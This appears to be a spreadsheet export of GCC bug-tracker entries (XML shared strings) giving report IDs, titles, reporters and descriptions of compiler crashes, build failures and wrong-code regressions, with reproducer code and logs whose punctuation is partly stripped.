g++ -c   -g -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings   -DHAVE_CONFIG_H -I. -I. -I/home/dimhen/src/gcc_current/gcc -I/home/dimhen/src/gcc_current/gcc/. -I/home/dimhen/src/gcc_current/gcc/../include -I/home/dimhen/src/gcc_current/gcc/../libcpp/include -I/home/dimhen/build/gcc_current_fold/./gmp -I/home/dimhen/src/gcc_current/gmp -I/home/dimhen/build/gcc_current_fold/./mpfr -I/home/dimhen/src/gcc_current/mpfr -I/home/dimhen/src/gcc_current/mpc/src  -I/home/dimhen/src/gcc_current/gcc/../libdecnumber -I/home/dimhen/src/gcc_current/gcc/../libdecnumber/bid -I../libdecnumber -I/home/dimhen/src/gcc_current/gcc/../libbacktrace -DCLOOG_INT_GMP -I/home/dimhen/build/gcc_current_fold/./cloog/include -I/home/dimhen/src/gcc_current/cloog/include -I/home/dimhen/src/gcc_current/cloog/include  -I/home/dimhen/build/gcc_current_fold/./isl/include -I/home/dimhen/src/gcc_current/isl/include  -o fold-const.o -MT fold-const.o -MMD -MP -MF ./.deps/fold-const.TPo /home/dimhen/src/gcc_current/gcc/fold-const.c
/home/dimhen/src/gcc_current/gcc/fold-const.c:14871:5: error: 'hash_table' has not been declared
     hash_table  &gt;)
     ^
[...]
For me help the following
$ svn diff
Index: fold-const.c
===================================================================
--- fold-const.c	(revision 205300)
+++ fold-const.c	(working copy)
@@ -686 +6810 @@
 #include gimplify.h
 #include tree-dfa.h
+#ifdef ENABLE_FOLD_CHECKING
+#include hash-table.h
+#endif
+
 /* Nonzero if we are folding constants inside an initializer zero
    otherwise.  */
 int folding_initializer = 0</t>
  </si>
  <si>
    <t>dimhen</t>
  </si>
  <si>
    <t>GCC-5715</t>
  </si>
  <si>
    <t>alpha-OSF - sends incorrect options to as.</t>
  </si>
  <si>
    <t>gcc/config/alpha/osf.h 
includes the line
#define ASM_SPEC %{!mgas:-g %(asm_oldas)} -nocpp %{pg} -O0
problems with this line include -O0 is sent when mgas is
selected - and gas doesnt support -O0
also -nocpp is Always sent - which is bad when the input file is .s - and needs cpp ... - prehaps gcc should be running cpp on .s - but I couldnt find anywhere that it was programmed to do so.
Release:
3.0.3
Environment:
alphaev56-dec-osf4.0d
How-To-Repeat:
compiling mozilla 0.9.8 - the xpcom/reflect/md/unix 
running make causes gcc calls the OSF as - which core dumps because it cant handle the .s file which contains comments.
After installing gas to try and fix this - gcc just dies at assembly stage no matter what - since -O0 gets passed to as which gas doesnt understand.</t>
  </si>
  <si>
    <t>tilps</t>
  </si>
  <si>
    <t>GCC-3233</t>
  </si>
  <si>
    <t>gcc 3.0 segmentation fault while compiling it self</t>
  </si>
  <si>
    <t>(gcc version info)
Reading specs from /usr/bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ./configure --prefix=/usr/
Thread model: single
gcc version 3.0
After compiling gcc 3.0 once and making install i've recompiled it's own source yet again with gcc 3.0. which when making sources in gcc-3.0/gcc directory cored.
Release:
unknown
Environment:
Linux asuka 2.4.5-ac9 #1 SMP Wed Jun 6 12:25:43 EDT 2001 i686 unknown
How-To-Repeat:
make gcc and then make it again using it self</t>
  </si>
  <si>
    <t>hackie</t>
  </si>
  <si>
    <t>GCC-36301</t>
  </si>
  <si>
    <t>target mips64vrel-elf configure-target-libiberty error</t>
  </si>
  <si>
    <t>I ran into this error while attempting building 4.2.4 configured as below. Any suggestion is appreciated. thanks in advance.
/***** configuration *****/
CFLAGS=-O2 $DEPACK_DIR/gcc-4.2.4/configure --target=mips64vrel-elf \
  --prefix=$PREFIX_DIR --enable-languages=cc++ --disable-__cxa_atexit \
  --with-gnu-as --with-gnu-ld --with-newlib \
  --with-gxx-include-dir=$PREFIX_DIR/mips64vrel-elf/include -v \
  2&gt;&amp;1 | tee configure.log
/***** error: *****/
...snip...
Adding multilib support to Makefile in /ecostools/src/gcc-4.2.4/libiberty
with_multisubdir=long64/vr5000
Running configure in multilib subdir long64/vr5400
pwd: /tmp/build-mips64vrel-elf-20080520/gcc/mips64vrel-elf
configure: creating cache ./config.cache
checking whether to enable maintainer-specific portions of Makefiles... no
checking for makeinfo... makeinfo --split-size=5000000
checking for perl... perl
checking build system type... i686-pc-cygwin
checking host system type... mips64vrel-unknown-elf
checking for mips64vrel-elf-ar... /ecostools/mips64vrel-elf-20080520/mips64vrel-
elf/bin/ar
checking for mips64vrel-elf-ranlib... /ecostools/mips64vrel-elf-20080520/mips64v
rel-elf/bin/ranlib
checking for mips64vrel-elf-gcc... /tmp/build-mips64vrel-elf-20080520/gcc/./gcc/
xgcc -B/tmp/build-mips64vrel-elf-20080520/gcc/./gcc/ -nostdinc -B/tmp/build-mips
64vrel-elf-20080520/gcc/mips64vrel-elf/newlib/ -isystem /tmp/build-mips64vrel-el
f-20080520/gcc/mips64vrel-elf/newlib/targ-include -isystem /ecostools/src/gcc-4.
2.4/newlib/libc/include -B/ecostools/mips64vrel-elf-20080520/mips64vrel-elf/bin/
 -B/ecostools/mips64vrel-elf-20080520/mips64vrel-elf/lib/ -isystem /ecostools/mi
ps64vrel-elf-20080520/mips64vrel-elf/include -isystem /ecostools/mips64vrel-elf-
20080520/mips64vrel-elf/sys-include
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... yes
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether /tmp/build-mips64vrel-elf-20080520/gcc/./gcc/xgcc -B/tmp/build-
mips64vrel-elf-20080520/gcc/./gcc/ -nostdinc -B/tmp/build-mips64vrel-elf-2008052
0/gcc/mips64vrel-elf/newlib/ -isystem /tmp/build-mips64vrel-elf-20080520/gcc/mip
s64vrel-elf/newlib/targ-include -isystem /ecostools/src/gcc-4.2.4/newlib/libc/in
clude -B/ecostools/mips64vrel-elf-20080520/mips64vrel-elf/bin/ -B/ecostools/mips
64vrel-elf-20080520/mips64vrel-elf/lib/ -isystem /ecostools/mips64vrel-elf-20080
520/mips64vrel-elf/include -isystem /ecostools/mips64vrel-elf-20080520/mips64vre
l-elf/sys-include accepts -g... yes
checking for /tmp/build-mips64vrel-elf-20080520/gcc/./gcc/xgcc -B/tmp/build-mips
64vrel-elf-20080520/gcc/./gcc/ -nostdinc -B/tmp/build-mips64vrel-elf-20080520/gc
c/mips64vrel-elf/newlib/ -isystem /tmp/build-mips64vrel-elf-20080520/gcc/mips64v
rel-elf/newlib/targ-include -isystem /ecostools/src/gcc-4.2.4/newlib/libc/includ
e -B/ecostools/mips64vrel-elf-20080520/mips64vrel-elf/bin/ -B/ecostools/mips64vr
el-elf-20080520/mips64vrel-elf/lib/ -isystem /ecostools/mips64vrel-elf-20080520/
mips64vrel-elf/include -isystem /ecostools/mips64vrel-elf-20080520/mips64vrel-el
f/sys-include option to accept ANSI C... none needed
checking how to run the C preprocessor... /tmp/build-mips64vrel-elf-20080520/gcc
/./gcc/xgcc -B/tmp/build-mips64vrel-elf-20080520/gcc/./gcc/ -nostdinc -B/tmp/bui
ld-mips64vrel-elf-20080520/gcc/mips64vrel-elf/newlib/ -isystem /tmp/build-mips64
vrel-elf-20080520/gcc/mips64vrel-elf/newlib/targ-include -isystem /ecostools/src
/gcc-4.2.4/newlib/libc/include -B/ecostools/mips64vrel-elf-20080520/mips64vrel-e
lf/bin/ -B/ecostools/mips64vrel-elf-20080520/mips64vrel-elf/lib/ -isystem /ecost
ools/mips64vrel-elf-20080520/mips64vrel-elf/include -isystem /ecostools/mips64vr
el-elf-20080520/mips64vrel-elf/sys-include -E
checking whether /tmp/build-mips64vrel-elf-20080520/gcc/./gcc/xgcc -B/tmp/build-
mips64vrel-elf-20080520/gcc/./gcc/ -nostdinc -B/tmp/build-mips64vrel-elf-2008052
0/gcc/mips64vrel-elf/newlib/ -isystem /tmp/build-mips64vrel-elf-20080520/gcc/mip
s64vrel-elf/newlib/targ-include -isystem /ecostools/src/gcc-4.2.4/newlib/libc/in
clude -B/ecostools/mips64vrel-elf-20080520/mips64vrel-elf/bin/ -B/ecostools/mips
64vrel-elf-20080520/mips64vrel-elf/lib/ -isystem /ecostools/mips64vrel-elf-20080
520/mips64vrel-elf/include -isystem /ecostools/mips64vrel-elf-20080520/mips64vre
l-elf/sys-include accepts -Wc++-compat... yes
checking whether /tmp/build-mips64vrel-elf-20080520/gcc/./gcc/xgcc -B/tmp/build-
mips64vrel-elf-20080520/gcc/./gcc/ -nostdinc -B/tmp/build-mips64vrel-elf-2008052
0/gcc/mips64vrel-elf/newlib/ -isystem /tmp/build-mips64vrel-elf-20080520/gcc/mip
s64vrel-elf/newlib/targ-include -isystem /ecostools/src/gcc-4.2.4/newlib/libc/in
clude -B/ecostools/mips64vrel-elf-20080520/mips64vrel-elf/bin/ -B/ecostools/mips
64vrel-elf-20080520/mips64vrel-elf/lib/ -isystem /ecostools/mips64vrel-elf-20080
520/mips64vrel-elf/include -isystem /ecostools/mips64vrel-elf-20080520/mips64vre
l-elf/sys-include and cc understand -c and -o together... yes
checking for an ANSI C-conforming const... yes
checking for inline... inline
checking whether byte ordering is bigendian... no
checking for a BSD-compatible install... /usr/bin/install -c
checking for sys/file.h... yes
checking for sys/param.h... yes
checking for limits.h... yes
checking for stdlib.h... yes
checking for malloc.h... yes
checking for string.h... yes
checking for unistd.h... yes
checking for strings.h... no
checking for sys/time.h... yes
checking for time.h... yes
checking for sys/resource.h... yes
checking for sys/stat.h... yes
checking for sys/mman.h... no
checking for fcntl.h... yes
checking for alloca.h... yes
checking for sys/pstat.h... no
checking for sys/sysmp.h... no
checking for sys/sysinfo.h... no
checking for machine/hal_sysinfo.h... no
checking for sys/table.h... no
checking for sys/sysctl.h... no
checking for sys/systemcfg.h... no
checking for stdint.h... yes
checking for stdio_ext.h... no
checking for sys/wait.h that is POSIX.1 compatible... yes
checking whether time.h and sys/time.h may both be included... yes
checking whether errno must be declared... no
checking for egrep... grep -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... (cached) yes
checking for stdlib.h... (cached) yes
checking for string.h... (cached) yes
checking for memory.h... no
checking for strings.h... (cached) no
checking for inttypes.h... yes
checking for stdint.h... (cached) yes
checking for unistd.h... (cached) yes
checking for int... yes
checking size of int... 4
checking for uintptr_t... yes
checking for a 64-bit type... uint64_t
checking for pid_t... yes
checking for stdlib.h... (cached) yes
checking for unistd.h... (cached) yes
checking for getpagesize... no
checking for working mmap... no
checking for working strncmp... no
updating cache ./config.cache
configure: creating ./config.status
config.status: creating Makefile
mkdir: cannot create directory `': No such file or directory
config.status: error: cannot create directory 
make[1]: *** [configure-target-libiberty] Error 1
make[1]: Leaving directory `/tmp/build-mips64vrel-elf-20080520/gcc'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-82606</t>
  </si>
  <si>
    <t>[PDT] ICE in gfc_extract_int at fortran/expr.c:641</t>
  </si>
  <si>
    <t>With reversed declaration order :
$ cat z1.f90
program p
   type t(a b)
      integer len :: b
      integer kind :: a
      real(a) :: r(b)
   end type
   type(t(8 :)) allocatable :: x
   real(x%a) :: y
end
$ gfortran-8-20171015 -c z1.f90
f951: internal compiler error: Segmentation fault
0xb5a08f crash_signal
        ../../gcc/toplev.c:326
0x68e96d gfc_extract_int(gfc_expr* int* int)
        ../../gcc/fortran/expr.c:641
0x67980d gfc_match_kind_spec(gfc_typespec* bool)
        ../../gcc/fortran/decl.c:2754
0x67faa2 gfc_match_decl_type_spec(gfc_typespec* int)
        ../../gcc/fortran/decl.c:4053
0x68115c gfc_match_data_decl()
        ../../gcc/fortran/decl.c:5605
0x6dbac9 match_word_omp_simd
        ../../gcc/fortran/parse.c:93
0x6df17e match_word
        ../../gcc/fortran/parse.c:376
0x6df17e decode_statement
        ../../gcc/fortran/parse.c:376
0x6e0fb4 next_free
        ../../gcc/fortran/parse.c:1225
0x6e0fb4 next_statement
        ../../gcc/fortran/parse.c:1457
0x6e289c parse_spec
        ../../gcc/fortran/parse.c:3831
0x6e4d93 parse_progunit
        ../../gcc/fortran/parse.c:5634
0x6e6354 gfc_parse_file()
        ../../gcc/fortran/parse.c:6174
0x72a6bf gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-60965</t>
  </si>
  <si>
    <t>[4.10 Regression] IPA: Devirtualization versus placement new</t>
  </si>
  <si>
    <t>Created attachment 32683
Reproducer here:
Summary: Devirtualization uses type information to determine if a
virtual method is reachable from a call site.  If type information
indicates that it is not devirt marks the site as unreachable.  I
think this is wrong and it breaks some programs.
Consider this class:
class Container {
  void *buffer[5]
public:
  EmbeddedObject *obj() { return (EmbeddedObject*)buffer }
  Container() { new (buffer) EmbeddedObject() }
}
Placement new is used to embed an object in a buffer inside another
object.  Its address can be retrieved.  This usage of placement new is
common and it even appears as the canonical use of placement new in
the in the C++ FAQ at
http://www.parashift.com/c++-faq/placement-new.html.  (I am aware that
this may not be strictly legal.  For one thing the memory at buffer
may not be suitably aligned.  Please bear with me.)
The embedded object is an instance of:
class EmbeddedObject {
public:
  virtual int val() { return 2 }
}
And it is called like this:
extern Container o
int main() {
  cout val() &lt;&lt; endl
}
The devirtualization pass looks into the call to val() and the type of
o decides that there is no type inside o that is compatible with
EmbeddedObject and inserts a call to __builtin_unreachanble().  As a
result instead of printing 2 the program does nothing.</t>
  </si>
  <si>
    <t>aph</t>
  </si>
  <si>
    <t>GCC-48694</t>
  </si>
  <si>
    <t>[4.7 Regression] possible memory hog bug</t>
  </si>
  <si>
    <t>Created attachment 24047
hog-inducing c code
It's not totally clear this is a bug but the attached program is about 36 KB and compiling it exhausts the RAM on a 6 GB x86-64 box.</t>
  </si>
  <si>
    <t>GCC-68154</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE on initializing character parameter array (explicit implied)</t>
  </si>
  <si>
    <t>Some variants of initializing a character parameter array
(explicit-shape implied-shape) are not working :
$ cat z1.f90
program p
   character(1) parameter :: x1(2) = 'a'
   character(*) parameter :: x2(2) = x1
   character(*) parameter :: x3(*) = x1
end
$ gfortran -g -O0 -Wall -fcheck=all z1.f90
f951: internal compiler error: Segmentation fault
$ cat z2.f90
program p
   character(*) parameter :: x1(2) = 'a'
   character(*) parameter :: x2(2) = x1
   character(*) parameter :: x3(*) = x1
end
$ gfortran -g -O0 -Wall -fcheck=all z2.f90
f951: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-3531</t>
  </si>
  <si>
    <t>namespace lookup for template specialization fails</t>
  </si>
  <si>
    <t xml:space="preserve">	
	Given the code below.  g++ rejects the specialization of ns::foo
	despite the explicit namespace qualification.
	The Message reads:
		ns_templspec.C:5: specializing `struct ns::foo' in
		different namespace
		ns_templspec.C:2:   from definition of `template
		struct ns::foo'
Release:
3.0
Environment:
System: SunOS memorum 5.7 Generic_106541-08 sun4u sparc SUNWUltra-1
Architecture: sun4
host: sparc-sun-solaris2.7
build: sparc-sun-solaris2.7
target: sparc-sun-solaris2.7
configured with: ../gcc-3.0/configure --with-ld=/usr/ccs/bin/ld --with-as=/usr/ccs/bin/as --disable-nls --disable-threads --enable-languages=cc++
How-To-Repeat:
cat ns_templspec.C
	namespace ns {
		template struct foo
	}
	template struct ns::foo { }
EOT
g++ ns_templspec.C</t>
  </si>
  <si>
    <t>gjlos</t>
  </si>
  <si>
    <t>GCC-36373</t>
  </si>
  <si>
    <t>[4.3 Regression] Wrong code with struct return</t>
  </si>
  <si>
    <t>extern void abort (void)
struct Foo {
    int *p
    int *q
}
struct Foo __attribute__((noinline))
bar(int *p)
{
  struct Foo f
  f.p = p
  return f
}
void __attribute__((noinline))
foo(struct Foo f)
{
  *f.p = 0
}
int main()
{
  int a b
  a = 0
  b = 1
  struct Foo f
  f = bar (
  f.q = 
  foo(f)
  if (b != 0)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-45412</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: SIGSEGV in update_ssa (tree-flow-inline.h:479) with -O2 -fipa-cp-clone -ftracer</t>
  </si>
  <si>
    <t>Command line:
$ g++ -O2 -fipa-cp-clone -ftracer testcase.C
Valgrind output:
$ valgrind -q --trace-children=yes /mnt/svn/gcc-trunk/binary-163468-lto-fortran-checking-yes-rtl-df/bin/g++ -O2 -fipa-cp-clone -ftracer testcase.C
==31083== Invalid read of size 8
==31083==    at 0x112BDF0: search_line_sse2 (lex.c:384)
==31083==    by 0x112BFD9: _cpp_clean_line (lex.c:649)
==31083==    by 0x112C9D7: _cpp_get_fresh_line (lex.c:1862)
==31083==    by 0x112E161: _cpp_lex_direct (lex.c:1927)
==31083==    by 0x112EF56: _cpp_lex_token (lex.c:1801)
==31083==    by 0x1131697: cpp_get_token (macro.c:1240)
==31083==    by 0x113194F: cpp_get_token_with_location (macro.c:1352)
==31083==    by 0x687E5C: c_lex_with_flags (c-lex.c:302)
==31083==    by 0x59ADAF: cp_lexer_get_preprocessor_token (parser.c:525)
==31083==    by 0x5C19BA: c_parse_file (parser.c:425)
==31083==    by 0x68D4EA: c_common_parse_file (c-opts.c:1206)
==31083==    by 0x9E7518: toplev_main (toplev.c:971)
==31083==  Address 0x71085b8 is 216 bytes inside a block of size 217 alloc'd
==31083==    at 0x4C261DF: realloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==31083==    by 0x115545C: xrealloc (xmalloc.c:179)
==31083==    by 0x1120BAF: _cpp_convert_input (charset.c:1734)
==31083==    by 0x1129542: read_file (files.c:648)
==31083==    by 0x1129F6A: _cpp_stack_file (files.c:723)
==31083==    by 0x112B850: cpp_read_main_file (init.c:570)
==31083==    by 0x68CB9A: c_common_post_options (c-opts.c:1124)
==31083==    by 0x9E6A14: toplev_main (toplev.c:1743)
==31083==    by 0x6589BBC: (below main) (in /lib64/libc-2.11.2.so)
==31083== 
==31083== Invalid read of size 8
==31083==    at 0x112BDE3: search_line_sse2 (lex.c:372)
==31083==    by 0x112BFD9: _cpp_clean_line (lex.c:649)
==31083==    by 0x112C9D7: _cpp_get_fresh_line (lex.c:1862)
==31083==    by 0x112E161: _cpp_lex_direct (lex.c:1927)
==31083==    by 0x112EF56: _cpp_lex_token (lex.c:1801)
==31083==    by 0x1131697: cpp_get_token (macro.c:1240)
==31083==    by 0x113194F: cpp_get_token_with_location (macro.c:1352)
==31083==    by 0x687E5C: c_lex_with_flags (c-lex.c:302)
==31083==    by 0x59ADAF: cp_lexer_get_preprocessor_token (parser.c:525)
==31083==    by 0x5C19BA: c_parse_file (parser.c:425)
==31083==    by 0x68D4EA: c_common_parse_file (c-opts.c:1206)
==31083==    by 0x9E7518: toplev_main (toplev.c:971)
==31083==  Address 0x71085b8 is 216 bytes inside a block of size 217 alloc'd
==31083==    at 0x4C261DF: realloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==31083==    by 0x115545C: xrealloc (xmalloc.c:179)
==31083==    by 0x1120BAF: _cpp_convert_input (charset.c:1734)
==31083==    by 0x1129542: read_file (files.c:648)
==31083==    by 0x1129F6A: _cpp_stack_file (files.c:723)
==31083==    by 0x112B850: cpp_read_main_file (init.c:570)
==31083==    by 0x68CB9A: c_common_post_options (c-opts.c:1124)
==31083==    by 0x9E6A14: toplev_main (toplev.c:1743)
==31083==    by 0x6589BBC: (below main) (in /lib64/libc-2.11.2.so)
==31083== 
==31083== Invalid read of size 8
==31083==    at 0xA2CDE5: update_ssa (tree-flow-inline.h:479)
==31083==    by 0x8F95D7: execute_function_todo (passes.c:1206)
==31083==    by 0x8F9BEE: execute_todo (passes.c:1283)
==31083==    by 0x8FC2B9: execute_one_pass (passes.c:1591)
==31083==    by 0x8FC4E4: execute_pass_list (passes.c:1623)
==31083==    by 0x8FC4F6: execute_pass_list (passes.c:1624)
==31083==    by 0xA3EE65: tree_rest_of_compilation (tree-optimize.c:452)
==31083==    by 0xBFB595: cgraph_expand_function (cgraphunit.c:1469)
==31083==    by 0xBFDF99: cgraph_optimize (cgraphunit.c:1548)
==31083==    by 0xBFE4E9: cgraph_finalize_compilation_unit (cgraphunit.c:1012)
==31083==    by 0x58BD9C: cp_write_global_declarations (decl2.c:3924)
==31083==    by 0x9E7554: toplev_main (toplev.c:983)
==31083==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==31083== 
testcase.C: In member function 'virtual int S::vm()':
testcase.C:11:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r163468 - crash
r162940 - crash
r161659 - OK</t>
  </si>
  <si>
    <t>GCC-54785</t>
  </si>
  <si>
    <t>-mprefer-avx128 is undocumented</t>
  </si>
  <si>
    <t>-mprefer-avx128 is added to GCC 4.7 but isn't documented.</t>
  </si>
  <si>
    <t>GCC-4805</t>
  </si>
  <si>
    <t>Internal compiler error</t>
  </si>
  <si>
    <t>The compiler said Internal compiler error.  Please submit a full bug report.  I don't know
more than that.  Here's the way it happened:
c++ -c -O2 -w -DIO_FLEXIO -DIO_OLDNCSA -DLINUX_ABSOFT -DACE_IO -DLINUX -DPORT_GROUP -DWant_c_files -I. -I../include -INONE/include -I/usr/local/include -I/usr/include/mpi -I/home/shawley/include -DLINUX -DLINUX -DPORT_GROUP -DWant_c_files -DIO_RNPLIO -DSTDC_HEADERS=1 -DHAVE_STRDUP=1 -DHAVE_ATEXIT=1 -DLINUX -DHAVE_LIBNETCDF=1 -DHAVE_LIBDF=1 -DHAVE_HDF=1 -DHAVE_LIBVS=1 -DHAVE_LIBSV=1 -DHAVE_LIBMPI=1 -DACE_REUSE_GDB -DDEBUG_PRINT -DACE_WRITEBOXES -DDEBUG_PRINT_GD_FILL ACEDistribution.cpp
ACEDistribution.cpp: In method `ACEDistribution::ACEDistribution(int BBoxList &amp;)':
ACEDistribution.cpp:30: Internal compiler error.
ACEDistribution.cpp:30: Please submit a full bug report.
ACEDistribution.cpp:30: Internal compiler error:
ACEDistribution.cpp:30: See  for instructions
Release:
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs    gcc version 2.95.4 20011006 (Debian prerelease
Environment:
debian linux 2.4.9
How-To-Repeat:
 c++ -c -O2 -w -DIO_FLEXIO -DIO_OLDNCSA -DLINUX_ABSOFT -DACE_IO -DLINUX -DPORT_GROUP -DWant_c_files -I. -I../include -INONE/include -I/usr/local/include -I/usr/include/mpi -I/home/shawley/include -DLINUX -DLINUX -DPORT_GROUP -DWant_c_files -DIO_RNPLIO -DSTDC_HEADERS=1 -DHAVE_STRDUP=1 -DHAVE_ATEXIT=1 -DLINUX -DHAVE_LIBNETCDF=1 -DHAVE_LIBDF=1 -DHAVE_HDF=1 -DHAVE_LIBVS=1 -DHAVE_LIBSV=1 -DHAVE_LIBMPI=1 -DACE_REUSE_GDB -DDEBUG_PRINT -DACE_WRITEBOXES -DDEBUG_PRINT_GD_FILL ACEDistribution.cpp</t>
  </si>
  <si>
    <t>GCC-67761</t>
  </si>
  <si>
    <t>On Linux/x86 r228231 gave
make[6]: Leaving directory '/export/gnu/import/git/gcc-test-ia32/bld'
Comparing stages 2 and 3
warning: gcc/cc1obj-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
gcc/coverage.o differs
gcc/dwarf2out.o differs
gcc/loop-iv.o differs
gcc/cp/init.o differs
gcc/tree-ssa-loop-ivcanon.o differs
gcc/predict.o differs
gcc/cfgloopmanip.o differs
gcc/tree-ssa-math-opts.o differs
gcc/function.o differs
gcc/tree-ssa-forwprop.o differs
gcc/tree-ssa-reassoc.o differs
gcc/tree-vect-loop.o differs
gcc/gimple-fold.o differs
gcc/loop-unroll.o differs
gcc/double-int.o differs
gcc/tree-ssa-alias.o differs
gcc/expr.o differs
gcc/gcov.o differs
gcc/i386-c.o differs
gcc/combine.o differs
gcc/tree-ssa-ccp.o differs
gcc/tree-chkp.o differs
gcc/fortran/trans-common.o differs
gcc/tree-vrp.o differs
gcc/var-tracking.o differs
gcc/tree-dfa.o differs
gcc/ipa-prop.o differs
gcc/gimple-ssa-strength-reduction.o differs
gcc/fold-const.o differs
gcc/dwarf2cfi.o differs
gcc/tree-ssa-sccvn.o differs
gcc/reload1.o differs
gcc/gcov-dump.o differs
gcc/mcf.o differs
gcc/tree-affine.o differs
gcc/tree-ssa-loop-niter.o differs
gcc/value-prof.o differs
libbacktrace/dwarf.o differs
libbacktrace/.libs/dwarf.o differs
libcpp/expr.o differs
libiberty/simple-object-coff.o differs
libiberty/pic/simple-object-coff.o differs
libiberty/pic/simple-object-xcoff.o differs
libiberty/simple-object-xcoff.o differs
Makefile:23262: recipe for target 'compare' failed
make[5]: *** [compare] Error 1
make[5]: Leaving directory '/export/gnu/import/git/gcc-test-ia32/bld'
Makefile:23241: recipe for target 'stage3-bubble' failed
make[4]: *** [stage3-bubble] Error 2
make[4]: Leaving directory '/export/gnu/import/git/gcc-test-ia32/bld'
Makefile:23304: recipe for target 'bootstrap' failed
make[3]: *** [bootstrap] Error 2
make[3]: Leaving directory '/export/gnu/import/git/gcc-test-ia32/bld'
14439.95user 447.65system 1:10:45elapsed 350%CPU (0avgtext+0avgdata 542356maxresident)k
144528inputs+14881128outputs (6202major+106936680minor)pagefaults 0swaps
Makefile:291: recipe for target 'bootstrap' failed
make[2]: *** [bootstrap] Error 2
when configured with
--with-arch=core2 --with-cpu=slm --prefix=/usr/6.0.0 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-libmpx i686-linux --with-fpmath=sse --enable-languages=cc++fortranjavaltoobjc</t>
  </si>
  <si>
    <t>ienkovich</t>
  </si>
  <si>
    <t>GCC-3696</t>
  </si>
  <si>
    <t>natPlainSocketImpl.cc doesn't compile on ALPHA OSF1</t>
  </si>
  <si>
    <t>When natPlainSocketImpl.cc is compiled there are message errors:
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc: In member
   function `virtual void
   java::net::PlainSocketImpl::bind(java::net::InetAddress* __java_int)':
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc:195: cannot
   convert `socklen_t*' to `int*' for argument `3' to `int getsockname(int
   sockaddr* int*)'
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc: In member
   function `virtual void
   java::net::PlainSocketImpl::connect(java::net::InetAddress* __java_int)':
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc:241: cannot
   convert `socklen_t*' to `int*' for argument `3' to `int getsockname(int
   sockaddr* int*)'
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc: In member
   function `void
   java::net::PlainSocketImpl::accept(java::net::PlainSocketImpl*)':
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc:286: cannot
   convert `socklen_t*' to `int*' for argument `3' to `int accept(int
   sockaddr* int*)'
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc: In member
   function `virtual java::lang::Object*
   java::net::PlainSocketImpl::getOption(__java_int)':
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc:422: cannot
   convert `socklen_t*' to `int*' for argument `5' to `int getsockopt(int int
   int void* int*)'
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc:435: cannot
   convert `socklen_t*' to `int*' for argument `5' to `int getsockopt(int int
   int void* int*)'
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc:451: cannot
   convert `socklen_t*' to `int*' for argument `5' to `int getsockopt(int int
   int void* int*)'
../../../gcc-20010702/libjava/java/net/natPlainSocketImpl.cc:465: cannot
   convert `socklen_t*' to `int*' for argument `3' to `int getsockname(int
   sockaddr* int*)'
Release:
gcc snapshot 20010702
Environment:
ALPHA OSF1 V5.0 910</t>
  </si>
  <si>
    <t>ake</t>
  </si>
  <si>
    <t>GCC-52979</t>
  </si>
  <si>
    <t>[4.7 Regression] likely wrong code bug w/packed bitfields</t>
  </si>
  <si>
    <t>[regehr@dyson r30]$ current-gcc -O2 small.c  ./a.out 
0
[regehr@dyson r30]$ current-gcc -O3 small.c  ./a.out 
1
[regehr@dyson r30]$ cat small.c
int printf (const char * ...)
int c d e
void fn1 ()
{
}
#pragma pack(1)
struct S1
{
    int f0:31
    int f1:6
} 
a = { 1 }
static struct S1 b = { 1 }
void fn2 ()
{
    for ()
    {
        a.f1 = 1
        struct S1 f = { }
        b = f
        e = 0
        if (d)
            c = a.f0
        break
    }
}
void fn3 ()
{
    fn2 ()
    a = b
}
int main (void)
{
    fn3 ()
    printf (%d\n a.f0)
    return 0
}
[regehr@dyson r30]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r186403-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r186403-install --program-prefix=r186403- --enable-languages=cc++
Thread model: posix
gcc version 4.8.0 20120413 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-49343</t>
  </si>
  <si>
    <t>[4.7 regression] ICE on field with variable offset</t>
  </si>
  <si>
    <t>This is a problem recently exposed on the mainline.  SRA (early variant) decides to scalarize a record containing a field with variable offset and aborts:
+===========================GNAT BUG DETECTED==============================+
| 4.7.0 20110608 (experimental) [trunk revision 174799] (i586-suse-linux-gnu) GCC error:|
| in tree_low_cst at tree.c:6441                                          |
| Error detected around discr31.adb:12:1
#0  internal_error (gmsgid=0x92e69cf in %s at %s:%d)
